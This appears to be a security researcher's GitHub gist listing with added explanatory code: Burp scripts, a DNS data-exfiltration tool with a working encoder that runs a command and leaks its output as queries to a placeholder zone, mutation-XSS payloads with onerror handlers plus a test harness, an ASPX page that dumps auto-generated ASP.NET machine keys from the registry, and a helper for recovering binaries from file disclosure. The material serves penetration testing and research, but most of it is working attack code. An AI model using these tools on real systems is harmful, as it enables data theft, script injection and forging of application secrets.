Soroush Dalili irsdl

  • @MDSecLabs (Twitter)
  • @irsdl (Twitter), UK, The Contrived World of InfoSec "'><b>abcd
irsdl / pyscripter_snippets.py
Last active Nov 12, 2020 — forked from lanmaster53/pyscripter_snippets.py
Burp Python Scripter scripts
```python
# ***********************************************replacer_for_python_scripter
# Burp "Python Scripter" snippet: the extension runs this body for every message
# with callbacks, helpers, toolFlag, messageIsRequest and messageInfo already
# bound (Jython 2.7, hence the Python 2 print statement).
import re, random

print callbacks.getToolName(toolFlag)
if messageIsRequest:
    # Only touch requests that come from Proxy, Intruder or Repeater
    if callbacks.getToolName(toolFlag) in ("Proxy", "Intruder", "Repeater"):
        requestInfo = helpers.analyzeRequest(messageInfo)
        headers = requestInfo.getHeaders()
        # Body starts at the offset reported by the request analyser
        msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():]
        msg = helpers.bytesToString(msgBody)
```
irsdl / dns_data_exfiltration.sh
Created Oct 13, 2020
A bash script that automates the exfiltration of data over dns in case we have a blind command execution on a server where all outbound connections except DNS are blocked.
```bash
#!/bin/bash
# Usage:
#   ./dns_data_exfiltration.sh "ls -lh"   # the output of "ls -lh" will be exfiltrated over DNS
#
# Todo:
#   1. add support for powershell
#      something like the following should do the trick but hasn't been tested:
#      outer_cmd_template="powershell -enc %CMD_B64%"
#
# (The usage text was originally a ": '...'" block; the apostrophe in "haven't"
# would have terminated that quoted string, so it is written as # comments here.)
```
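The listing only shows the usage header of the gist, so here is the mechanism it automates, written out as an added Python example (not irsdl's script): the sender hex-encodes the command output, cuts it into DNS labels of at most 63 octets, prefixes each label with a sequence number and a session id under an attacker-controlled zone, and resolves the resulting names; the receiver reads the names back out of the authoritative server's query log and reassembles them. The zone `exfil.example.com`, the session id `s1`, `SAMPLE_OUTPUT` and the log lines are all constructed for the demo; `send_queries` is the only function that touches the network and nothing calls it at import time.

```python
"""DNS exfiltration encoder/decoder (added example, not irsdl's script).

Sender: hex-encode the output, split it into labels, resolve the names.
Receiver: pull the names out of a resolver query log and reassemble them.
ZONE, the session id and the log lines are constructed for the demo.
"""
import binascii
import re
import socket
import subprocess

MAX_LABEL = 63                # RFC 1035: one label is at most 63 octets
MAX_NAME = 253                # practical limit for a full name in text form
ZONE = "exfil.example.com"    # hypothetical attacker-controlled zone

# Constructed stand-in for the output of the blind command (69 bytes).
SAMPLE_OUTPUT = b"total 8\n-rw-r--r-- 1 www-data www-data 1337 Oct 13 10:00 secrets.txt\n"


def encode_queries(data, session, zone=ZONE, label_len=60):
    """Return, in order, the names the victim has to resolve to leak `data`."""
    if not 1 <= label_len <= MAX_LABEL:
        raise ValueError("label_len must be between 1 and 63")
    # Hex rather than base64: DNS names are case-insensitive and resolvers may
    # rewrite case in transit, which would corrupt a base64 alphabet.
    hexdata = binascii.hexlify(data).decode("ascii")
    chunks = [hexdata[i:i + label_len] for i in range(0, len(hexdata), label_len)]
    names = []
    for seq, chunk in enumerate(chunks):
        name = "%d.%s.%s.%s" % (seq, chunk, session, zone)
        if len(name) > MAX_NAME:
            raise ValueError("name too long: shorten label_len or the session id")
        names.append(name)
    return names


def run_and_encode(command, session, zone=ZONE):
    """Blind command execution helper: run `command`, capture stdout and stderr."""
    proc = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    return encode_queries(proc.stdout, session, zone)


def send_queries(names):
    """Resolve each name so the query reaches the zone's authoritative server.
    The answer is irrelevant (NXDOMAIN is expected); only the query carries data."""
    for name in names:
        try:
            socket.gethostbyname(name)
        except socket.gaierror:
            pass


# Receiver side -------------------------------------------------------------
_QUERY_NAME = re.compile(r"query: (\S+)")                       # name field of a BIND-style query log line
_CHUNK = re.compile(r"^(\d+)\.([0-9a-f]+)\.([^.]+)\.(.+)$")     # seq . hexchunk . session . zone


def names_from_log(lines):
    """Extract the queried names from query-log lines (constructed format, see demo_log)."""
    return [m.group(1) for m in map(_QUERY_NAME.search, lines) if m]


def decode_queries(names, session, zone=ZONE):
    """Reassemble the data from queried names; order, case and retries do not matter."""
    parts = {}
    for name in names:
        m = _CHUNK.match(name.lower().rstrip("."))
        if not m or m.group(3) != session.lower() or m.group(4) != zone.lower():
            continue                                   # unrelated query or another session
        parts[int(m.group(1))] = m.group(2)            # a retried chunk simply overwrites itself
    if not parts:
        return b""
    expected = max(parts) + 1                          # a lost *last* chunk cannot be detected this way
    missing = [i for i in range(expected) if i not in parts]
    if missing:
        raise ValueError("missing chunks: %s" % missing)
    return binascii.unhexlify("".join(parts[i] for i in range(expected)))


def demo_log(session="s1"):
    """Constructed resolver log (loosely BIND query-log style): the exfil queries
    arrive out of order, one of them is retried in upper case, plus an unrelated lookup."""
    names = encode_queries(SAMPLE_OUTPUT, session)
    queries = [names[2], names[0], names[1], names[1].upper(), "www.example.net"]
    return ["13-Oct-2020 10:00:0%d.000 client 203.0.113.7#41231: query: %s IN A" % (i, q)
            for i, q in enumerate(queries)]


if __name__ == "__main__":
    print(decode_queries(names_from_log(demo_log()), "s1").decode())
```

Each query carries at most 30 bytes with 60-character hex labels, so long outputs mean many lookups; base32 would roughly double that density and is still safe under case folding, whereas base64 is not. The decoder cannot tell that the final chunk was lost, so a real tool should send a terminating marker or the total chunk count as well.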
irsdl / mXSS
Last active Jun 21, 2020
some mXSS samples
```html
<img alt="<x" title="/><img src=url404 onerror=xss(0)>">
<img alt="
<x" title="/>
<img src=url404 onerror=xss(1)>">
<style><style/><img src=url404 onerror=xss(2)>
<xmp><xmp/><img src=url404 onerror=xss(3)>
```
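All four samples are inert for a parser that follows the HTML tokenizer rules: a `<` inside a quoted attribute value is part of the value, and everything after a `<style>` or `<xmp>` start tag is raw text up to the matching end tag, so the inner `<img ... onerror=...>` never becomes an element. They only fire when some stage in between (a sanitizer, a serializer, a second parser) reads the markup under different rules, which is what makes them mutation XSS test vectors. The added example below (not part of the gist) is a small harness for checking exactly that: it runs the samples through a minimal tokenizer that applies those two rules and through a regex check of the kind found in naive filters, and reports where the two disagree. `xss()` is just the callback name taken from the samples; the `RAW_TEXT` set lists the HTML elements whose content is raw text or RCDATA.

```python
"""Parser-differential harness for mXSS vectors (added example, not from the gist)."""
import re

# Elements whose content is raw text / RCDATA: nothing inside them is a tag.
RAW_TEXT = {"style", "xmp", "script", "textarea", "title", "iframe", "noembed", "noframes"}
_TAG_OPEN = re.compile(r"<([A-Za-z][^\s/>]*)")
# The kind of check a naive filter does: an <tag ... onXXX=> somewhere in the text.
_NAIVE_HANDLER = re.compile(r"<\s*[a-z][^>]*\bon[a-z]+\s*=", re.I)
_WS = " \t\n\r\f"

# The four vectors from the gist, verbatim.
SAMPLES = [
    '<img alt="<x" title="/><img src=url404 onerror=xss(0)>">',
    '<img alt="\n<x" title="/>\n<img src=url404 onerror=xss(1)>">',
    '<style><style/><img src=url404 onerror=xss(2)>',
    '<xmp><xmp/><img src=url404 onerror=xss(3)>',
]


def tokenize(html):
    """Return [(tag_name, {attr: value})] for the start tags an HTML tokenizer would emit."""
    tags, i, n, lower = [], 0, len(html), html.lower()
    while i < n:
        if html[i] != "<":
            i += 1
            continue
        if html.startswith("</", i):                 # end tag: skip to its '>'
            close = html.find(">", i)
            i = n if close == -1 else close + 1
            continue
        m = _TAG_OPEN.match(html, i)
        if not m:                                    # a stray '<' is just text
            i += 1
            continue
        name, i, attrs = m.group(1).lower(), m.end(), {}
        while i < n and html[i] != ">":
            if html[i] in _WS + "/":
                i += 1
                continue
            j = i
            while j < n and html[j] not in _WS + "/=>":
                j += 1
            aname, i = html[i:j].lower(), j
            while i < n and html[i] in _WS:
                i += 1
            value = ""
            if i < n and html[i] == "=":
                i += 1
                while i < n and html[i] in _WS:
                    i += 1
                if i < n and html[i] in "\"'":       # quoted value: '<' and '>' are data here
                    end = html.find(html[i], i + 1)
                    value = html[i + 1:] if end == -1 else html[i + 1:end]
                    i = n if end == -1 else end + 1
                else:                                # unquoted value ends at whitespace or '>'
                    j = i
                    while j < n and html[j] not in _WS + ">":
                        j += 1
                    value, i = html[i:j], j
            if aname and aname not in attrs:
                attrs[aname] = value
        i += 1                                       # consume '>'
        tags.append((name, attrs))
        if name in RAW_TEXT:                         # swallow everything up to the end tag
            close = lower.find("</" + name, i)
            i = n if close == -1 else close
    return tags


def handlers(html):
    """Event-handler attributes a tokenizer-based parser would actually see."""
    return [(tag, a) for tag, attrs in tokenize(html) for a in attrs if a.startswith("on")]


def naive_flags(html):
    """Whether the regex-style filter thinks there is a handler."""
    return bool(_NAIVE_HANDLER.search(html))


def differential(samples=SAMPLES):
    """One row per sample: what the naive check says versus what the tokenizer sees."""
    return [{"sample": i, "naive": naive_flags(s), "tokenizer": handlers(s)}
            for i, s in enumerate(samples)]


if __name__ == "__main__":
    for row in differential():
        print(row)
```

Every row comes back with `naive` true and `tokenizer` empty: a filter that strips or rejects on the regex match is acting on text the browser treats as data, and whatever it rewrites is where a mutation can creep in. When testing a real sanitizer, replace `naive_flags` with a call into it and compare its output, re-tokenized, against the original.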
irsdl / machineKeyFinder.aspx
Last active Apr 12, 2021
To find validation and decryption keys when AutoGenerate has been used in Machine Key settings
```aspx
<%@ Page Language="C#" %>
<%
// Read https://soroush.secproject.com/blog/2019/05/danger-of-stealing-auto-generated-net-machine-keys/
// Auto-generated keys live in the registry hive of the user the worker process runs as,
// so this page has to execute under the application pool identity whose keys you want.
// Registry.GetValue returns null only when the key itself is missing; a missing value
// returns the empty-array default and prints as an empty string.
Response.Write("<br/><hr/>");
byte[] autoGenKeyV4 = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\", "AutoGenKeyV4", new byte[]{});
if(autoGenKeyV4!=null)
    Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\4.0.30319.0\\AutoGenKeyV4: "+BitConverter.ToString(autoGenKeyV4).Replace("-", string.Empty));
Response.Write("<br/>");
byte[] autoGenKey = (byte[]) Microsoft.Win32.Registry.GetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\", "AutoGenKey", new byte[]{});
if(autoGenKey!=null)
    Response.Write("HKCU\\Software\\Microsoft\\ASP.NET\\2.0.50727.0\\AutoGenKey: "+BitConverter.ToString(autoGenKey).Replace("-", string.Empty));
%>
```
irsdl / iso-8859-1_to_binary.py
Last active Mar 19, 2018
Convert from iso-8859-1 to binary
```python
# Convert a file that was read as iso-8859-1 and then written out as UTF-8 back to its
# original bytes. Useful for file disclosure when the encoding can be controlled: every
# byte maps to one code point under iso-8859-1, so nothing is lost on the way out.
# The following C# code shows an example (result is iso-8859-1, then UTF-8 encoded):
#
#     string encoding = "iso-8859-1";
#     string sourceFile = @"Newtonsoft.Json.dll";
#
#     public void test()
#     {
#         System.Text.Encoding myEncoding = Encoding.GetEncoding(encoding);
#         String sourceFilePath = Directory.GetCurrentDirectory() + @"\" + sourceFile;
```
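The listing cuts the gist off inside its C# comment, so the conversion itself is not visible. The added example below (not the gist's code) reproduces the server-side step in Python, reverses it, and also handles the case where the disclosed text comes back inside a JSON string, where the framework `\u00XX`-escapes the non-ASCII characters instead of emitting raw UTF-8. `FAKE_DLL` is a constructed stand-in for the disclosed file that contains every byte value once, so the round trip is fully exercised.

```python
"""Undo the iso-8859-1 -> UTF-8 re-encoding of a disclosed binary (added example)."""
import json

# Constructed "binary": a PE-like header followed by every byte value once.
FAKE_DLL = b"MZ" + bytes(range(256))


def leak_as_text(raw):
    """What the server does: decode the file as iso-8859-1 (byte b becomes U+00bb,
    nothing is lost, unlike a UTF-8 decode that would replace invalid sequences)
    and emit the resulting string as UTF-8."""
    return raw.decode("iso-8859-1").encode("utf-8")


def json_leak(raw):
    """Same leak, but returned inside a JSON string (non-ASCII gets \\u00XX-escaped)."""
    return json.dumps(raw.decode("iso-8859-1"))


def is_recoverable(leaked):
    """True if `leaked` is valid UTF-8 whose code points all fit in one byte,
    i.e. it really went through the iso-8859-1 -> UTF-8 path and nothing else."""
    try:
        text = leaked.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ord(c) <= 0xFF for c in text)


def recover_binary(leaked):
    """Reverse the mapping: UTF-8 bytes -> code points -> one byte per code point.
    Raises UnicodeEncodeError if a code point above U+00FF sneaked in, which means
    the text was mangled somewhere else (a different encoding, HTML entities, ...)."""
    return leaked.decode("utf-8").encode("iso-8859-1")


def recover_from_json(json_text):
    """Recover the bytes when the leak arrived as a JSON string literal."""
    return json.loads(json_text).encode("iso-8859-1")


if __name__ == "__main__":
    leaked = leak_as_text(FAKE_DLL)
    print(len(FAKE_DLL), "bytes became", len(leaked), "bytes; recovered:",
          recover_binary(leaked) == FAKE_DLL)
```

Run `is_recoverable` before trusting the output: a response that the server produced with a lossy decode (UTF-8 with replacement characters, or a code page that drops bytes) will fail that check, and no amount of re-encoding brings the original bytes back.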